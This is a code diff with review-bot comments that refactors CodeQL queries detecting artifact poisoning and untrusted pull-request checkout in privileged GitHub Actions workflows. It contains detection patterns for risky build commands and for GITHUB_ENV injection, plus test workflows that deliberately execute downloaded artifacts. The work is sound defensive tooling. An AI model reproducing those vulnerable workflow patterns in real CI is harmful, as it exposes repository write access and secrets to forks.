- BuildRunStep() {
- exists(UntrustedArtifactDownloadStep step |
- step.getAFollowingStep() = this and
- exists(
- this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _)
- )
- )
- }
-}
-
-class LocalCommandExecutionRunStep extends PoisonableStep, Run {
- LocalCommandExecutionRunStep() {
- exists(UntrustedArtifactDownloadStep step |
- step.getAFollowingStep() = this and
- // Heuristic:
- // Run step with a command starting with `./xxxx`, `sh xxxx`, ...
- exists(
- this.getScript()
- .splitAt("\n")
- .trim()
- .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _)
- )
- )
- }
-}
-
-class EnvVarInjectionRunStep extends PoisonableStep, Run {
- EnvVarInjectionRunStep() {
- exists(UntrustedArtifactDownloadStep step, string value |
- step.getAFollowingStep() = this and
- // Heuristic:
- // Run step with env var definition based on file content.
- // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV`
- // eg: `echo "sha=$(> $GITHUB_ENV`
- Utils::writeToGitHubEnv(this, _, value) and
- // TODO: add support for other commands like `<`, `jq`, ...
- value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"])
- )
- }
-}
-
 class ArtifactPoisoningSink extends DataFlow::Node {
 ArtifactPoisoningSink() {
- exists(PoisonableStep step |
- step.(Run).getScriptScalar() = this.asExpr() or
- step.(UsesStep) = this.asExpr()
+ exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable |
+ download.getAFollowingStep() = poisonable and
+ (
+ poisonable.(Run).getScriptScalar() = this.asExpr()
+ or
+ poisonable.(UsesStep) = this.asExpr()
+ ) and
+ (
+ not poisonable instanceof LocalCommandExecutionRunStep or
+ poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%")
+ )
 )
 }
 }
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
new file mode 100644
index 00000000000..130879a7cb6
--- /dev/null
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
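Review bot: The path filter added to `ArtifactPoisoningSink` compares with `getCommand().matches(download.getPath() + "%")`, and `matches` treats `%` and `_` as wildcards, so a download path containing `_` is compared loosely and a path `foo` also accepts a command under `foobar/`. The comparison is also a raw prefix test on the captured command, so a step written as `sh ./foo/cmd` or `bash -e foo/cmd` would likely stop being reported even though it runs the downloaded file; how `getPath()` normalises its value is not visible in this hunk. For a literal prefix, `getCommand().prefix(download.getPath().length()) = download.getPath()` avoids the wildcard semantics, and stripping a leading `./` and interpreter flags from the command before comparing would keep the recall the removed `regexpFind` had. A fixture with a flag before the script path would pin this down.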
@@ -0,0 +1,64 @@
+import actions
+
+abstract class PoisonableStep extends Step { }
+
+// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
+private string dangerousActions() {
+ result =
+ ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"]
+}
+
+class DangerousActionUsesStep extends PoisonableStep, UsesStep {
+ DangerousActionUsesStep() { this.getCallee() = dangerousActions() }
+}
+
+// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
+private string dangerousCommands() {
+ result =
+ [
+ "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan",
+ "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate",
+ "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ",
+ "^ant ", "mkdocs build", "pytest"
+ ]
+}
+
+class BuildRunStep extends PoisonableStep, Run {
+ BuildRunStep() {
+ exists(
+ this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _)
+ )
+ }
+}
+
+class LocalCommandExecutionRunStep extends PoisonableStep, Run {
+ string cmd;
+
+ LocalCommandExecutionRunStep() {
+ // Heuristic:
+ // Run step with a command starting with `./xxxx`, `sh xxxx`, ...
+ exists(string line | line = this.getScript().splitAt("\n").trim() |
+ // ./xxxx
+ cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2)
+ or
+ // sh xxxx
+ cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3)
+ )
+ }
+
+ string getCommand() { result = cmd }
+}
+
+class EnvVarInjectionRunStep extends PoisonableStep, Run {
+ EnvVarInjectionRunStep() {
+ exists(string value |
+ // Heuristic:
+ // Run step with env var definition based on file content.
+ // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV`
+ // eg: `echo "sha=$(> $GITHUB_ENV`
+ Utils::writeToGitHubEnv(this, _, value) and
+ // TODO: add support for other commands like `<`, `jq`, ...
+ value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"])
+ )
+ }
+}
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
new file mode 100644
index 00000000000..c677915f504
--- /dev/null
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
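Review bot: `LocalCommandExecutionRunStep` now uses `regexpCapture`, which has to match the whole trimmed line, so only lines that begin with `./` or with `sh`/`bash`/`zsh`/`fish` are recognised; after `trim()` the `\\s+` alternative of `(^|\\s+)` can never apply. The version removed from `ArtifactPoisoningQuery.qll` used `regexpFind` and so also caught an invocation later on the line (after `cd dir &&`, `sudo`, and similar), which is now dropped for every query built on `PoisonableStep`. Allowing a leading command segment, e.g. `cmd = line.regexpCapture("(.*[\\s;&|])?\\.\\/(.*)", 2)` and the same prefix for the shell form, would restore that coverage. The new classes and `getCommand()` also carry no QLDoc; a one-line `/** ... */` on each stating the heuristic it implements would help query authors.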
@@ -0,0 +1,229 @@
+import actions
+import codeql.actions.DataFlow
+
+bindingset[s]
+predicate containsPullRequestNumber(string s) {
+ exists(
+ Utils::normalizeExpr(s)
+ .regexpFind([
+ "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b",
+ "\\bgithub\\.event\\.pull_request\\.id\\b",
+ "\\bgithub\\.event\\.pull_request\\.number\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b",
+ // heuristics
+ "\\bpr_number\\b", "\\bpr_id\\b"
+ ], _, _)
+ )
+}
+
+bindingset[s]
+predicate containsHeadSHA(string s) {
+ exists(
+ Utils::normalizeExpr(s)
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b",
+ "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_suite\\.after\\b",
+ "\\bgithub\\.event\\.check_suite\\.head_commit\\.id\\b",
+ "\\bgithub\\.event\\.check_suite\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.head_commit\\.id\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+ "\\bgithub\\.event\\.check_run\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+ // heuristics
+ "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b"
+ ], _, _)
+ )
+}
+
+bindingset[s]
+predicate containsHeadRef(string s) {
+ exists(
+ Utils::normalizeExpr(s)
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_branch\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+ // heuristics
+ "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b",
+ // env vars
+ "\\benv\\.GITHUB_HEAD_REF\\b",
+ ], _, _)
+ )
+}
+
+/** Checkout of a Pull Request HEAD ref */
+abstract class PRHeadCheckoutStep extends Step { }
+
+/** Checkout of a Pull Request HEAD ref using actions/checkout action */
+class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep {
+ ActionsMutableRefCheckout() {
+ this.getCallee() = "actions/checkout" and
+ (
+ // ref argument contains the PR id/number or head ref/sha
+ exists(Expression e |
+ (
+ containsHeadRef(e.getExpression()) or
+ containsPullRequestNumber(e.getExpression())
+ ) and
+ DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
+ )
+ or
+ // 3rd party actions returning the PR head sha/ref
+ exists(UsesStep step |
+ step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ // TODO: This should be read step of the head_sha or head_ref output vars
+ this.getArgument("ref").regexpMatch(".*head_ref.*") and
+ DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
+ )
+ or
+ // heuristic base on the step id and field name
+ exists(StepsExpression e |
+ this.getArgumentExpr("ref") = e and
+ (
+ e.getStepId().matches(["%ref%", "%branch%"]) or
+ e.getFieldName().matches(["%ref%", "%branch%"])
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using actions/checkout action */
+class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep {
+ ActionsSHACheckout() {
+ this.getCallee() = "actions/checkout" and
+ (
+ // ref argument contains the PR id/number or head ref/sha
+ exists(Expression e |
+ containsHeadSHA(e.getExpression()) and
+ DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
+ )
+ or
+ // 3rd party actions returning the PR head sha/ref
+ exists(UsesStep step |
+ step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ this.getArgument("ref").regexpMatch(".*head_sha.*") and
+ DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
+ )
+ or
+ // heuristic base on the step id and field name
+ exists(StepsExpression e |
+ this.getArgumentExpr("ref") = e and
+ (
+ e.getStepId().matches(["%sha%", "%commit%"]) or
+ e.getFieldName().matches(["%sha%", "%commit%"])
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using git within a Run step */
+class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
+ GitMutableRefCheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*git\\s+(fetch|pull).*") and
+ (
+ (containsHeadRef(line) or containsPullRequestNumber(line))
+ or
+ exists(string varname, string expr |
+ expr = this.getInScopeEnvVarExpr(varname).getExpression() and
+ (
+ containsHeadRef(expr) or
+ containsPullRequestNumber(expr)
+ ) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using git within a Run step */
+class GitSHACheckout extends PRHeadCheckoutStep instanceof Run {
+ GitSHACheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*git\\s+(fetch|pull).*") and
+ (
+ containsHeadSHA(line)
+ or
+ exists(string varname, string expr |
+ expr = this.getInScopeEnvVarExpr(varname).getExpression() and
+ containsHeadSHA(expr) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using gh within a Run step */
+class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
+ GhMutableRefCheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
+ (
+ (containsHeadRef(line) or containsPullRequestNumber(line))
+ or
+ exists(string varname |
+ (
+ containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) or
+ containsPullRequestNumber(this.getInScopeEnvVarExpr(varname).getExpression())
+ ) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using gh within a Run step */
+class GhSHACheckout extends PRHeadCheckoutStep instanceof Run {
+ GhSHACheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
+ (
+ containsHeadSHA(line)
+ or
+ exists(string varname |
+ containsHeadSHA(this.getInScopeEnvVarExpr(varname).getExpression()) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** An If node that contains an actor, user or label check */
+class ControlCheck extends If {
+ ControlCheck() {
+ exists(
+ Utils::normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.actor\\b", // actor
+ "\\bgithub\\.triggering_actor\\b", // actor
+ "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user
+ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user
+ "\\bgithub\\.event\\.pull_request\\.labels\\b", // label
+ "\\bgithub\\.event\\.label\\.name\\b" // label
+ ], _, _)
+ )
+ }
+}
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 3800ce9e85c..380cfdbd858 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@ library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.19
+version: 0.0.20
 dependencies:
 codeql/util: ^0.2.0
 codeql/yaml: ^0.1.2
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
deleted file mode 100644
index c9cbb0ab13c..00000000000
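Review bot: The step-id/field-name heuristic no longer covers names that contain only `head`: the deleted `ActionsCheckout` matched `["%sha%", "%head%", "branch"]`, while `ActionsMutableRefCheckout` uses `["%ref%", "%branch%"]` and `ActionsSHACheckout` uses `["%sha%", "%commit%"]`, so a `ref:` fed from a step output simply named `head` is classified by neither class and that checkout is no longer reported. If the narrowing is not intended, keep the pattern on the mutable variant, `e.getStepId().matches(["%ref%", "%branch%", "%head%"])`, and likewise for `getFieldName()`. Separately, the QLDoc and the `// ref argument contains ...` comment on the three `*SHACheckout` classes are copied from the mutable-ref classes; saying "pinned commit SHA" versus "mutable branch ref or PR number" there would document why the two families are split.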
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ /dev/null
@@ -1,150 +0,0 @@
-/**
- * @name Checkout of untrusted code in trusted context
- * @description Priveleged workflows have read/write access to the base repository and access to secrets.
- * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
- * that is able to push to the base repository and to access secrets.
- * @kind problem
- * @problem.severity warning
- * @precision medium
- * @security-severity 9.3
- * @id actions/untrusted-checkout
- * @tags actions
- * security
- * external/cwe/cwe-829
- */
-
-import actions
-import codeql.actions.DataFlow
-
-/** An If node that contains an actor, user or label check */
-class ControlCheck extends If {
- ControlCheck() {
- exists(
- Utils::normalizeExpr(this.getCondition())
- .regexpFind([
- "\\bgithub\\.actor\\b", // actor
- "\\bgithub\\.triggering_actor\\b", // actor
- "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user
- "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user
- "\\bgithub\\.event\\.pull_request\\.labels\\b", // label
- "\\bgithub\\.event\\.label\\.name\\b" // label
- ], _, _)
- )
- }
-}
-
-bindingset[s]
-predicate containsHeadRef(string s) {
- exists(
- Utils::normalizeExpr(s)
- .regexpFind([
- "\\bgithub\\.event\\.number\\b", // The pull request number.
- "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment.
- "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head.
- "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head.
- "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID.
- "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number.
- "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit.
- "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run.
- "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit.
- "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit.
- "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit.
- "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b",
- "\\bgithub\\.event\\.check_suite\\.head_sha\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
- "\\bgithub\\.event\\.check_run\\.head_sha\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b",
- // heuristics
- "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b"
- ], _, _)
- )
-}
-
-/** Checkout of a Pull Request HEAD ref */
-abstract class PRHeadCheckoutStep extends Step { }
-
-/** Checkout of a Pull Request HEAD ref using actions/checkout action */
-class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
- ActionsCheckout() {
- this.getCallee() = "actions/checkout" and
- (
- // ref argument contains the head ref
- exists(Expression e |
- containsHeadRef(e.getExpression()) and
- DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
- )
- or
- // 3rd party actions returning the PR head sha/ref
- exists(UsesStep head |
- head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
- DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))
- )
- or
- // heuristic base on the step id and field name
- exists(StepsExpression e |
- this.getArgumentExpr("ref") = e and
- (
- e.getStepId().matches(["%sha%", "%head%", "branch"]) or
- e.getFieldName().matches(["%sha%", "%head%", "branch"])
- )
- )
- )
- }
-}
-
-/** Checkout of a Pull Request HEAD ref using git within a Run step */
-class GitCheckout extends PRHeadCheckoutStep instanceof Run {
- GitCheckout() {
- exists(string line |
- this.getScript().splitAt("\n") = line and
- line.regexpMatch(".*git\\s+fetch.*") and
- (
- containsHeadRef(line)
- or
- exists(string varname |
- containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and
- exists(line.regexpFind(varname, _, _))
- )
- )
- )
- }
-}
-
-/** Checkout of a Pull Request HEAD ref using gh within a Run step */
-class GhCheckout extends PRHeadCheckoutStep instanceof Run {
- GhCheckout() {
- exists(string line |
- this.getScript().splitAt("\n") = line and
- line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
- (
- containsHeadRef(line)
- or
- exists(string varname |
- containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and
- exists(line.regexpFind(varname, _, _))
- )
- )
- )
- }
-}
-
-from Workflow w, PRHeadCheckoutStep checkout
-where
- w.isPrivileged() and
- w.getAJob().(LocalJob).getAStep() = checkout and
- not exists(ControlCheck check |
- checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
- )
-select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckout.md
rename to ql/src/Security/CWE-829/UntrustedCheckoutError.md
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql
new file mode 100644
index 00000000000..604acf71cc7
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql
@@ -0,0 +1,28 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Priveleged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/untrusted-checkout
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from Workflow w, PRHeadCheckoutStep checkout
+where
+ w.isPrivileged() and
+ w.getAJob().(LocalJob).getAStep() = checkout and
+ checkout.getAFollowingStep() instanceof PoisonableStep and
+ not exists(ControlCheck check |
+ checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ )
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
new file mode 100644
index 00000000000..d8dfd69ad28
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
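Review bot: `UntrustedCheckoutError.ql` declares `@id actions/untrusted-checkout`, and `UntrustedCheckoutWarning.ql` in the following file section declares the same id, the same `@name` and the same alert message, so results from the two queries cannot be told apart in reports, suppressions or query-suite filters. Each query needs its own id, for example by suffixing the severity as in `@id actions/untrusted-checkout-warning` for the second file, and the `select` message should say whether a poisonable step follows the checkout. The `@description` in both files also carries the typo `Priveleged` (should be `Privileged`), and `UntrustedCheckoutWarning.md` is added empty, so the warning variant ships without help text.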
@@ -0,0 +1,28 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Priveleged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity warning
+ * @precision medium
+ * @security-severity 5.3
+ * @id actions/untrusted-checkout
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from Workflow w, PRHeadCheckoutStep checkout
+where
+ w.isPrivileged() and
+ w.getAJob().(LocalJob).getAStep() = checkout and
+ not checkout.getAFollowingStep() instanceof PoisonableStep and
+ not exists(ControlCheck check |
+ checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ )
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index c431636c96a..c5a94e35d4b 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.19
+version: 0.0.20
 groups:
 - actions
 - queries
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
index 2f39bfd307a..e73548895d3 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
@@ -17,7 +17,7 @@ jobs:
 path: foo
 - name: Run command
 run: |
- ./foo/cmd
+ sh foo/cmd
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index 31fa3017551..ac970fff840 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -15,7 +15,7 @@ jobs: name: artifact_name workflow: wf.yml - name: Run command - run: ./cmd + run: sh cmd diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 3d1df408c3b..193eee3b66c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected 
@@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | 
@@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index 5bea5c7e52c..2819bf62fdf 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected 
